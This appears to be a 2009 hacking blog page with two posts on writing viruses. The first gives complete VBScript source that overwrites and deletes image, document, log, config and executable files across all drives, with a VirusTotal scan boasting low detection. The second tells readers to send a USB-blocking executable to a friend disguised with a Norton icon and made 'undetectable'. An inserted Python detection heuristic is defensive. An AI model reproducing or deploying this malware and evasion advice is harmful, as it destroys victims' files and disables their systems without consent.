top software

Tuesday, 10 November 2009

Virus Makers.

Source Code of Virus

Here is some code that overwrites files with the .jpg, .doc, .exe, .gif, .log and .ini extensions with "You have been infected" and changes them into .txt files.

I will try to change the code so it can have more stealth when dealing with antivirus programs.


Code:
On Error Resume Next

Dim FSobj, winDir, sysDir, copySelf, newFile, rawFileData, hackedFileData, fixData, dataFixed, newFileData
Set FSobj = CreateObject("Scripting.FileSystemOject")
Set sysDir = FSobj.GetSpecialFolder(1)

beginInfestation()

sub beginInfestation()
On Error Resume Next
Dim drive,machine
Set machine = FSobj.Drives
for each drive in machine
if (drive.type = 2) or (drive.type = 3) then
indexFolders(drive.Path&"\")
end if
next
end sub

sub indexFolders(location)
On Error Resume Next
Dim specs, file, subFol
Set specs = FSobj.GetFolder(location)
subFol = specs.SubFolders
for each file in subFol
spreadData(file.Path)
indexFolders(file.Path)
next
end sub

sub spreadData(location)
On Error Resume Next
Dim folder, directory, file, generateCopy, appName, adExt, orgMes, mesStageTwo, mesStageThree, finalMes, extName
Set folder = FSobj.GetFolder(location)
Set directory = folder.Files
orgMes = "You have been infected!"
esStageTwo=replace(orgMes,chr(42),chr(68))
mesStageThree=replace(mesStageTwo,chr(124),chr(46))
finalMes=replace(mesStageThree,chr(37),chr(76))
for each file in directory
extName=lcase(FSobj.GetExtensionName(file.Path))

if (extName="jpg")or(extName="gif")then
set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
generateCopy.write finalMes
generateCopy.Close
appName=FSobj.GetBaseName(file.Path)
set adExt=FSobj.GetFile(file.Path)
adExt.copy(location&"\"&appName&".txt")
FSobj.DeleteFile (file.Path)

elseIf (extName="log")or(extName="ini") then
set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
generateCopy.write finalMes
generateCopy.Close
appName=FSobj.GetBaseName(file.Path)
set adExt=FSobj.GetFile(file.Path)
adExt.copy(location&"\"&appName&".txt")
FSobj.DeleteFile (file.Path)

elseIf (extName="doc")or(extName="exe") then
set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
generateCopy.write finalMes
generateCopy.Close
appName=FSobj.GetBaseName(file.Path)
set adExt=FSobj.GetFile(file.Path)
adExt.copy(location&"\"&appName&".txt")
FSobj.DeleteFile (file.Path)
end if
next
end sub



SOME antivirus programs will pick this up. It is written in VBScript (.vbs extension).

UPDATE: 2/41 antivirus programs picked this up. Scan done by VirusTotal:

Code:
a-squared 4.5.0.24 2009.08.06 -
AhnLab-V3 5.0.0.2 2009.08.05 -
AntiVir 7.9.0.240 2009.08.05 -
Antiy-AVL 2.0.3.7 2009.08.05 -
Authentium 5.1.2.4 2009.08.06 -
Avast 4.8.1335.0 2009.08.06 -
AVG 8.5.0.406 2009.08.05 -
BitDefender 7.2 2009.08.06 -
CAT-QuickHeal 10.00 2009.08.05 -
ClamAV 0.94.1 2009.08.05 VBS.Pluta.A
Comodo 1880 2009.08.06 -
DrWeb 5.0.0.12182 2009.08.06 -
eSafe 7.0.17.0 2009.08.05 -
eTrust-Vet 31.6.6660 2009.08.05 -
F-Prot 4.4.4.56 2009.08.05 -
F-Secure 8.0.14470.0 2009.08.05 -
Fortinet 3.120.0.0 2009.08.05 -
GData 19 2009.08.06 -
Ikarus T3.1.1.64.0 2009.08.06 -
Jiangmin 11.0.800 2009.08.05 -
K7AntiVirus 7.10.811 2009.08.05 -
Kaspersky 7.0.0.125 2009.08.06 -
McAfee 5699 2009.08.05 -
McAfee+Artemis 5699 2009.08.05 -
McAfee-GW-Edition 6.8.5 2009.08.06 -
Microsoft 1.4903 2009.08.04 Virus:VBS/Generic1
NOD32 4310 2009.08.05 -
Norman 6.01.09 2009.08.05 -
nProtect 2009.1.8.0 2009.08.05 -
Panda 10.0.0.14 2009.08.05 -
PCTools 4.4.2.0 2009.08.05 -
Prevx 3.0 2009.08.06 -
Rising 21.41.24.00 2009.08.05 -
Sophos 4.44.0 2009.08.05 -
Sunbelt 3.2.1858.2 2009.08.05 -
Symantec 1.4.4.12 2009.08.06 -
TheHacker 6.3.4.3.377 2009.08.05 -
TrendMicro 8.950.0.1094 2009.08.05 -
VBA32 3.12.10.9 2009.08.06 -
ViRobot 2009.8.5.1869 2009.08.05 -
VirusBuster 4.6.5.0 2009.08.05 -
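
As an added example (not part of the original post): the scan above shows how few signature engines matched the script, so a defender triaging .vbs files can instead score the combination of behaviours the script relies on. The indicator weights, the threshold and both sample fragments are assumptions constructed for illustration.

```python
import re

# Behaviours visible in the script above. Weights and threshold are
# illustrative assumptions, not values from any antivirus product.
INDICATORS = {
    # Tolerates misspelled ProgIDs such as the one in the posted script.
    "fso_object": (r'CreateObject\s*\(\s*"Scripting\.FileSystemO\w*"', 1),
    "drive_enum": (r"\.Drives\b", 2),
    "recursive_walk": (r"\.SubFolders\b", 1),
    # Second argument 2 is ForWriting: existing content is replaced.
    "open_for_write": (r"\.OpenTextFile\s*\([^,\n]+,\s*2\b", 2),
    "delete_file": (r"\.DeleteFile\b", 2),
    "errors_silenced": (r"^\s*On\s+Error\s+Resume\s+Next", 1),
}
THRESHOLD = 6  # assumed cut-off for "needs analyst review"


def score_vbs(text):
    """Return (score, matched indicator names) for VBScript source text."""
    # Drop full-line comments so commented-out calls do not count.
    code = re.sub(r"(?im)^[ \t]*('|rem\b).*$", "", text)
    hits = [name for name, (pattern, _) in INDICATORS.items()
            if re.search(pattern, code, re.I | re.M)]
    return sum(INDICATORS[name][1] for name in hits), hits


def is_suspicious(text):
    return score_vbs(text)[0] >= THRESHOLD


# Constructed fragments (not complete scripts) that reuse the calls
# seen in the posted code, plus a benign log reader for contrast.
SAMPLE_FLAGGED = '''On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set machine = fso.Drives
Set subs = fso.GetFolder(location).SubFolders
Set out = fso.OpenTextFile(file.Path, 2, True)
fso.DeleteFile file.Path
'''
SAMPLE_BENIGN = '''Set fso = CreateObject("Scripting.FileSystemObject")
Set log = fso.OpenTextFile("C:\\logs\\app.log", 1)
' fso.DeleteFile is never called here
WScript.Echo log.ReadAll
'''

if __name__ == "__main__":
    for label, sample in (("flagged", SAMPLE_FLAGGED), ("benign", SAMPLE_BENIGN)):
        print(label, score_vbs(sample), is_suspicious(sample))
```
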


Friday, July 31, 2009


Creating a Virus to Disable USB Ports



Do you want to play a prank with your friend’s computer by disabling their USB ports? If so, here is a nice trick to do that! In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of the C language should be able to understand the working of this virus program.
Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the victim will not be able to use his pen drive or any other USB peripheral on his computer. The source code for this virus along with the compiled module is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports. Here is a step by step procedure to start playing the prank on your friend’s computer.
1. Download the USB_Block.rar file on to your computer.
2. It contains the following 4 files.
  • block_usb.c (source code)
  • unblock_usb.c (source code)
  • block_usb.exe
  • unblock_usb.exe
3. Out of these 4 files the block_usb.exe is the virus that will block (disable) all the USB ports on the computer upon execution (double click). You need to send this file to your friend. Once he executes it it’ll block all the USB ports on his computer.
4. Before sending you can test it on your own computer. To test, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe file. Now insert the pen drive and it should get detected.
5. The block_usb.c and unblock_usb.c files are the source code. You can compile them yourself if you’re interested (this is optional).
6. A step-by-step procedure to compile C programs is given in my post - How to Compile C Programs.
7. You can also change the icon of this file to make it look like a legitimate program. Example Take the Icon of Norton or something else and Bind the Exe File with it with any Binder. And Use Software PassPort to make it Undetectable.
I hope you like this post. Please pass your comments.
WARNING: This post is for educational purposes only. Do not misuse it.






